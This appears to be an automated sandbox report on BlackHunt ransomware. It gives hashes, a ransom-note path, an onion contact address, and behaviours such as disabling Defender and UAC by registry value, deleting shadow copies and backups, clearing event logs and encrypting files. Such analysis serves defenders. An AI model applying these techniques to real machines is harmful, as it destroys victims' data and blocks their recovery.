Analysis
-
max time kernel
127s -
max time network
130s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
18/01/2024, 22:57
Static task
static1
Behavioral task
behavioral1
Sample
31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe
Resource
win10v2004-20231215-en
General
-
Target
31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe
-
Size
707KB
-
MD5
554725fcb30af3be140699dc17d925d2
-
SHA1
b9047cfa792f5150f239eb52bc9ee49eb1284571
-
SHA256
31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281
-
SHA512
a464c5c8bcd4fc838e0167e546a125e53e5840c1b9c8f3195204b89b9a50aa9641147545162bbbe0abf46aefac3659e6bf9ddb38be86f69465c14b40af249265
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1N8uvnh:6uaTmkZJ+naie5OTamgEoKxLWowh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2420 fsutil.exe 3976 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 1784 wevtutil.exe 3552 wevtutil.exe 2312 wevtutil.exe 3572 wevtutil.exe 2072 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1668 bcdedit.exe 2452 bcdedit.exe 1420 bcdedit.exe 1284 bcdedit.exe -
Renames multiple (2888) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2836 wbadmin.exe 3764 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 2420 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\Q: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\W: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\I: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\Z: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\G: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\H: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\E: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\Y: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\U: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\B: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\S: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\V: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\M: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\N: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\P: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\J: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\K: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\O: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\A: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\X: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\R: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\T: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened (read-only) \??\L: 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh88 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-uisupport.xml 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\ast\#BlackHunt_ReadMe.hta 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\OldAge\#BlackHunt_ReadMe.hta 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Memories\16_9-frame-overlay.png 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#BlackHunt_ReadMe.txt 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Kiev 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\vlc.mo 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jre7\lib\jfr\default.jfc 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\El_Salvador 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\#BlackHunt_ReadMe.hta 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\ia\LC_MESSAGES\#BlackHunt_ReadMe.txt 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1254.TXT 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Atikokan 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\AST4ADT 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Karachi 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_zh_4.4.0.v20140623020002.jar 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Eucla 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\pa\#BlackHunt_Private.key 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\#BlackHunt_ReadMe.txt 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\#BlackHunt_Private.key 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_item.png 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#BlackHunt_ReadMe.hta 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#BlackHunt_ReadMe.txt 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Bougainville 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\eclipse.inf 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\#BlackHunt_ReadMe.hta 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.json 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Vignette\NavigationLeft_ButtonGraphic.png 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#BlackHunt_Private.key 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs.xml 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#BlackHunt_Private.key 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\lua\http\#BlackHunt_ReadMe.txt 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\#BlackHunt_Private.key 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.properties 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.artifact.repository_1.1.300.v20131211-1531.jar 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\4to3Squareframe_SelectionSubpicture.png 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\US_export_policy.jar 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montreal 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\DumontDUrville 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\brx\#BlackHunt_ReadMe.hta 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\#BlackHunt_Private.key 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\ta\#BlackHunt_ReadMe.txt 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\DVD Maker\#BlackHunt_Private.key 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#BlackHunt_ReadMe.hta 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_MoveDrop32x32.gif 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\mr\#BlackHunt_ReadMe.txt 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_de_DE.jar 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Troll 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\#BlackHunt_ReadMe.hta 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files\VideoLAN\VLC\plugins\stream_filter\#BlackHunt_ReadMe.hta 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\#BlackHunt_ReadMe.hta 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1700 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2856 vssadmin.exe 3988 vssadmin.exe 1376 vssadmin.exe 1776 vssadmin.exe 1660 vssadmin.exe 2720 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3060 taskkill.exe -
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2192 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1164 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe Token: SeRestorePrivilege 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe Token: SeBackupPrivilege 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe Token: SeTakeOwnershipPrivilege 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe Token: SeAuditPrivilege 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe Token: SeSecurityPrivilege 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe Token: SeIncBasePriorityPrivilege 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe Token: SeBackupPrivilege 1988 vssvc.exe Token: SeRestorePrivilege 1988 vssvc.exe Token: SeAuditPrivilege 1988 vssvc.exe Token: SeBackupPrivilege 1108 wbengine.exe Token: SeRestorePrivilege 1108 wbengine.exe Token: SeSecurityPrivilege 1108 wbengine.exe Token: SeSecurityPrivilege 1784 wevtutil.exe Token: SeBackupPrivilege 1784 wevtutil.exe Token: SeSecurityPrivilege 3572 wevtutil.exe Token: SeSecurityPrivilege 3552 wevtutil.exe Token: SeSecurityPrivilege 2072 wevtutil.exe Token: SeSecurityPrivilege 2312 wevtutil.exe Token: SeBackupPrivilege 3572 wevtutil.exe Token: SeBackupPrivilege 2312 wevtutil.exe Token: SeBackupPrivilege 3552 wevtutil.exe Token: SeBackupPrivilege 2072 wevtutil.exe Token: SeDebugPrivilege 3060 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2868 wrote to memory of 2780 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 139 PID 2868 wrote to memory of 2780 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 139 PID 2868 wrote to memory of 2780 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 139 PID 2868 wrote to memory of 2780 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 139 PID 2868 wrote to memory of 2836 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 141 PID 2868 wrote to memory of 2836 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 141 PID 2868 wrote to memory of 2836 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 141 PID 2868 wrote to memory of 2836 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 141 PID 2868 wrote to memory of 2840 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 136 PID 2868 wrote to memory of 2840 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 136 PID 2868 wrote to memory of 2840 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 136 PID 2868 wrote to memory of 2840 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 136 PID 2868 wrote to memory of 2860 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 134 PID 2868 wrote to memory of 2860 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 134 PID 2868 wrote to memory of 2860 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 134 PID 2868 wrote to memory of 2860 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 134 PID 2780 wrote to memory of 2696 2780 cmd.exe 133 PID 2780 wrote to memory of 2696 2780 cmd.exe 133 PID 2780 wrote to memory of 2696 2780 cmd.exe 133 PID 2868 wrote to memory of 2748 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 132 PID 2868 wrote to memory of 2748 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 132 PID 2868 wrote to memory of 2748 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 132 PID 2868 wrote to memory of 2748 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 132 PID 2868 wrote to memory of 2976 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 131 PID 2868 wrote to memory of 2976 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 131 PID 2868 wrote to memory of 2976 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 131 PID 2868 wrote to memory of 2976 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 131 PID 2868 wrote to memory of 1164 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 130 PID 2868 wrote to memory of 1164 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 130 PID 2868 wrote to memory of 1164 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 130 PID 2868 wrote to memory of 1164 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 130 PID 2840 wrote to memory of 2948 2840 cmd.exe 129 PID 2840 wrote to memory of 2948 2840 cmd.exe 129 PID 2840 wrote to memory of 2948 2840 cmd.exe 129 PID 2836 wrote to memory of 2592 2836 wbadmin.exe 128 PID 2836 wrote to memory of 2592 2836 wbadmin.exe 128 PID 2836 wrote to memory of 2592 2836 wbadmin.exe 128 PID 2868 wrote to memory of 2896 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 127 PID 2868 wrote to memory of 2896 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 127 PID 2868 wrote to memory of 2896 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 127 PID 2868 wrote to memory of 2896 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 127 PID 2868 wrote to memory of 2612 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 123 PID 2868 wrote to memory of 2612 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 123 PID 2868 wrote to memory of 2612 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 123 PID 2868 wrote to memory of 2612 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 123 PID 2868 wrote to memory of 2852 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 122 PID 2868 wrote to memory of 2852 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 122 PID 2868 wrote to memory of 2852 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 122 PID 2868 wrote to memory of 2852 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 122 PID 2868 wrote to memory of 2576 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 120 PID 2868 wrote to memory of 2576 2868 31a54ff9b1813a1d47882bf8f87bcb7bdcc5299abb47ee3b39550fc2c9307281.exe 120 